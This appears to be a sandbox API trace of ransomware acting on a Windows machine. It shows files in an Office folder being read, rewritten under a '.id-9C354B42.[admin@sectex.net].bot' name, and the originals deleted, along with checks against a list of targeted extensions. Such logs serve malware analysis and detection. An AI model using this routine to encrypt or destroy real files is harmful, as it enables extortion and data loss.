	[0157.847] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olmailr.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olmailr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0157.847] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.847] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olmailr.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0158.303] GetLastError () returned 0x0
	[0158.303] ReadFile (in: hFile=0x3c4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x27b0, lpOverlapped=0x0) returned 1
	[0158.460] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x27c0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x27c0, lpOverlapped=0x0) returned 1
	[0158.461] ReadFile (in: hFile=0x3c4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.461] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0158.461] SetEndOfFile (hFile=0x3d0) returned 1
	[0158.461] CloseHandle (hObject=0x3d0) returned 1
	[0158.461] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.461] SetEndOfFile (hFile=0x3c4) returned 1
	[0158.463] CloseHandle (hObject=0x3c4) returned 1
	[0158.464] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.464] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olmailr.fae")) returned 1
	[0158.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.465] lstrlenW (lpString=".doc") returned 4
	[0158.465] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0158.465] lstrlenW (lpString=".docx") returned 5
	[0158.465] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0158.465] lstrlenW (lpString=".pdf") returned 4
	[0158.465] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0158.465] lstrlenW (lpString=".xls") returned 4
	[0158.465] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0158.465] lstrlenW (lpString=".xlsx") returned 5
	[0158.465] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0158.465] lstrlenW (lpString=".ppt") returned 4
	[0158.465] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0158.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.465] lstrlenW (lpString=".zip") returned 4
	[0158.465] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0158.465] lstrlenW (lpString=".rar") returned 4
	[0158.465] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0158.465] lstrlenW (lpString=".bz2") returned 4
	[0158.465] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0158.465] lstrlenW (lpString=".7z") returned 3
	[0158.465] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0158.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.466] lstrlenW (lpString=".dbf") returned 4
	[0158.466] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0158.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.466] lstrlenW (lpString=".1cd") returned 4
	[0158.466] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0158.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.466] lstrlenW (lpString=".jpg") returned 4
	[0158.466] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0158.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.466] lstrlenW (lpString=".doc") returned 4
	[0158.466] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0158.466] lstrlenW (lpString=".docx") returned 5
	[0158.466] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0158.466] lstrlenW (lpString=".pdf") returned 4
	[0158.466] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0158.466] lstrlenW (lpString=".xls") returned 4
	[0158.466] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0158.466] lstrlenW (lpString=".xlsx") returned 5
	[0158.466] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0158.466] lstrlenW (lpString=".ppt") returned 4
	[0158.466] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0158.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.466] lstrlenW (lpString=".zip") returned 4
	[0158.466] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0158.466] lstrlenW (lpString=".rar") returned 4
	[0158.466] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0158.466] lstrlenW (lpString=".bz2") returned 4
	[0158.466] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0158.466] lstrlenW (lpString=".7z") returned 3
	[0158.466] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0158.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.467] lstrlenW (lpString=".dbf") returned 4
	[0158.467] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0158.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.467] lstrlenW (lpString=".1cd") returned 4
	[0158.467] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0158.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLMAILR.FAE") returned 67
	[0158.467] lstrlenW (lpString=".jpg") returned 4
	[0158.467] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0158.467] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0158.467] lstrlenW (lpString="OLTASKR.FAE") returned 11
	[0158.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oltaskr.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0158.468] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=10672) returned 1
	[0158.468] CloseHandle (hObject=0x3c4) returned 1
	[0158.468] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oltaskr.fae")) returned 0x20
	[0158.468] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oltaskr.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oltaskr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0158.468] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.468] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oltaskr.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0158.470] GetLastError () returned 0x0
	[0158.470] ReadFile (in: hFile=0x3c4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x29b0, lpOverlapped=0x0) returned 1
	[0158.537] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x29c0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x29c0, lpOverlapped=0x0) returned 1
	[0158.538] ReadFile (in: hFile=0x3c4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.538] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0158.538] SetEndOfFile (hFile=0x3d0) returned 1
	[0158.538] CloseHandle (hObject=0x3d0) returned 1
	[0158.538] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.538] SetEndOfFile (hFile=0x3c4) returned 1
	[0158.543] CloseHandle (hObject=0x3c4) returned 1
	[0158.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.597] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oltaskr.fae")) returned 1
	[0158.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.598] lstrlenW (lpString=".doc") returned 4
	[0158.598] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0158.598] lstrlenW (lpString=".docx") returned 5
	[0158.598] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0158.598] lstrlenW (lpString=".pdf") returned 4
	[0158.598] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0158.598] lstrlenW (lpString=".xls") returned 4
	[0158.598] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0158.598] lstrlenW (lpString=".xlsx") returned 5
	[0158.598] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0158.598] lstrlenW (lpString=".ppt") returned 4
	[0158.598] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0158.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.598] lstrlenW (lpString=".zip") returned 4
	[0158.598] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0158.598] lstrlenW (lpString=".rar") returned 4
	[0158.598] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0158.598] lstrlenW (lpString=".bz2") returned 4
	[0158.598] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0158.598] lstrlenW (lpString=".7z") returned 3
	[0158.598] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0158.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.598] lstrlenW (lpString=".dbf") returned 4
	[0158.598] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0158.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.598] lstrlenW (lpString=".1cd") returned 4
	[0158.599] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0158.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.599] lstrlenW (lpString=".jpg") returned 4
	[0158.599] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0158.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.599] lstrlenW (lpString=".doc") returned 4
	[0158.599] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0158.599] lstrlenW (lpString=".docx") returned 5
	[0158.599] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0158.599] lstrlenW (lpString=".pdf") returned 4
	[0158.599] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0158.599] lstrlenW (lpString=".xls") returned 4
	[0158.599] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0158.599] lstrlenW (lpString=".xlsx") returned 5
	[0158.599] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0158.599] lstrlenW (lpString=".ppt") returned 4
	[0158.599] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0158.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.599] lstrlenW (lpString=".zip") returned 4
	[0158.599] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0158.599] lstrlenW (lpString=".rar") returned 4
	[0158.599] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0158.599] lstrlenW (lpString=".bz2") returned 4
	[0158.599] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0158.599] lstrlenW (lpString=".7z") returned 3
	[0158.599] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0158.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.600] lstrlenW (lpString=".dbf") returned 4
	[0158.600] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0158.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.600] lstrlenW (lpString=".1cd") returned 4
	[0158.600] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0158.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLTASKR.FAE") returned 67
	[0158.600] lstrlenW (lpString=".jpg") returned 4
	[0158.600] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0158.600] lstrcmpiW (lpString1=".SAM", lpString2=".bot") returned 1
	[0158.600] lstrlenW (lpString="ACT3.SAM") returned 8
	[0158.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\act3.sam"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0158.600] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=90488) returned 1
	[0158.600] CloseHandle (hObject=0x25c) returned 1
	[0158.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\act3.sam")) returned 0x20
	[0158.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\act3.sam.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\act3.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0158.601] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.601] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\act3.sam.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0158.602] GetLastError () returned 0x0
	[0158.602] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x16178, lpOverlapped=0x0) returned 1
	[0158.652] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x16180, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x16180, lpOverlapped=0x0) returned 1
	[0158.654] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.654] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0158.654] SetEndOfFile (hFile=0x3c4) returned 1
	[0158.654] CloseHandle (hObject=0x3c4) returned 1
	[0158.654] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.654] SetEndOfFile (hFile=0x25c) returned 1
	[0158.696] CloseHandle (hObject=0x25c) returned 1
	[0158.696] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.701] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\act3.sam")) returned 1
	[0158.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.702] lstrlenW (lpString=".doc") returned 4
	[0158.702] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.702] lstrlenW (lpString=".docx") returned 5
	[0158.702] lstrcmpiW (lpString1=".docx", lpString2="3.SAM") returned -1
	[0158.702] lstrlenW (lpString=".pdf") returned 4
	[0158.702] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.702] lstrlenW (lpString=".xls") returned 4
	[0158.702] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.702] lstrlenW (lpString=".xlsx") returned 5
	[0158.702] lstrcmpiW (lpString1=".xlsx", lpString2="3.SAM") returned -1
	[0158.702] lstrlenW (lpString=".ppt") returned 4
	[0158.702] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.702] lstrlenW (lpString=".zip") returned 4
	[0158.702] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.702] lstrlenW (lpString=".rar") returned 4
	[0158.702] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.702] lstrlenW (lpString=".bz2") returned 4
	[0158.702] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.702] lstrlenW (lpString=".7z") returned 3
	[0158.702] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.702] lstrlenW (lpString=".dbf") returned 4
	[0158.702] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.702] lstrlenW (lpString=".1cd") returned 4
	[0158.703] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.703] lstrlenW (lpString=".jpg") returned 4
	[0158.703] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.703] lstrlenW (lpString=".doc") returned 4
	[0158.703] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.703] lstrlenW (lpString=".docx") returned 5
	[0158.703] lstrcmpiW (lpString1=".docx", lpString2="3.SAM") returned -1
	[0158.703] lstrlenW (lpString=".pdf") returned 4
	[0158.703] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.703] lstrlenW (lpString=".xls") returned 4
	[0158.703] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.703] lstrlenW (lpString=".xlsx") returned 5
	[0158.703] lstrcmpiW (lpString1=".xlsx", lpString2="3.SAM") returned -1
	[0158.703] lstrlenW (lpString=".ppt") returned 4
	[0158.703] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.703] lstrlenW (lpString=".zip") returned 4
	[0158.703] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.703] lstrlenW (lpString=".rar") returned 4
	[0158.703] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.703] lstrlenW (lpString=".bz2") returned 4
	[0158.703] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.703] lstrlenW (lpString=".7z") returned 3
	[0158.704] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.704] lstrlenW (lpString=".dbf") returned 4
	[0158.704] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.704] lstrlenW (lpString=".1cd") returned 4
	[0158.704] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM") returned 59
	[0158.704] lstrlenW (lpString=".jpg") returned 4
	[0158.704] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.704] lstrcmpiW (lpString1=".SAM", lpString2=".bot") returned 1
	[0158.704] lstrlenW (lpString="ODBC.SAM") returned 8
	[0158.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\odbc.sam"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0158.705] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=63864) returned 1
	[0158.705] CloseHandle (hObject=0x3b8) returned 1
	[0158.706] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\odbc.sam")) returned 0x20
	[0158.706] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\odbc.sam.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
